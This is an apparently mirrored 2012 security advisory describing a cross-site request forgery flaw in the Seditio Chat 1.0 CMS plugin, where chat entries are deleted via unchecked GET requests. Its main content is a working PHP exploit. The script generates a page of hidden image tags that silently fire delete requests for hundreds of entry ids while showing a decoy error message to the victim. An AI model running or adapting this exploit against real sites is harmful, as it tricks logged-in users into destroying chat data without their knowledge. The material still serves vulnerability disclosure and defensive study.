Lucene search
K

Seditio Chat 1.0 Cross Site Request Forgery

🗓️ 11 Apr 2012 00:00:00Reported by AkastepType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

Seditio Chat 1.0 CSRF vulnerability in delete entries functio

Code
`=========================================================  
Vulnerable Software: Seditio Chat Plugin (Chat İndex Plugin) v 1.0  
http://www.seditio-eklenti.com/page.php?id=418  
http://www.seditio-eklenti.com/chat-plugin-index-d418.html  
Downloaded: http://www.seditio-eklenti.com/datas/users/1-chat.rar  
(MD5 SUM: d1565b438199984661cf2147572724a6 *1-chat.rar)  
=========================================================  
Tested:  
With Seditio v165  
*php.ini MAGIC_QUOTES_GPC OFF*  
Safe mode off  
/*  
OS: Windows XP SP2 (32 bit)  
Apache: 2.2.21.0  
PHP Version: 5.2.17.17  
mysql> select version()  
-> ;  
+-----------+  
| version() |  
+-----------+  
| 5.5.21 |  
+-----------+  
*/  
=========================================================  
About Software:  
Seditio Chat Plugin (Chat İndex Plugin) v 1.0 is popular plugin for Seditio CMS.  
It gives ability to users~administrators~moderators to chatting.  
=========================================================  
Vuln Desc:  
This plugin is prone to CROSS SITE REQUEST FORGERY vulnerability.  
It uses $_GET without any proper check of request validity when deleting entries from chat.  
It can be used by malicious people for delete chat entries.  
================ Seditio chat plugin Delete chat entries CSRF exploit =================  
<?php  
/*  
4 Fun  
Seditio chat plugin Delete chat entries CSRF exploit (Sounds peacifull xD)  
*/  
$target='http://192.168.0.15/learn/128/sed/seditio165/'; // target site  
$howmuch=500;// how much entries to "rm" in chat? :)  
  
  
/* Do not change */  
  
$body=str_repeat(PHP_EOL,300);  
$howmuch=(int)$howmuch;  
$sithere=strrev('OoPs! Can not Load Page.WTH? What about Refresh ?');// 4 think about :D.While we deleting chat entries:D  
for($i=0;$i<=$howmuch;$i++)  
{  
$body.='<img src="'. $target . '/plug.php?e=chat&c=delete&id=' . $i . '" width="0" height="0" /><br>' .PHP_EOL;  
}  
die($body . '<h1>' . $sithere . '</h1>');  
/* EOF */  
?>  
==============================EOF================================  
  
  
/AkaStep ^_^  
+++++++Greetz to all+++++++++++  
packetstormsecurity.*,securityfocus.com,cxsecurity.com,security.nnov.ru,securtiyvulns.com and to all others!  
Thank you.  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation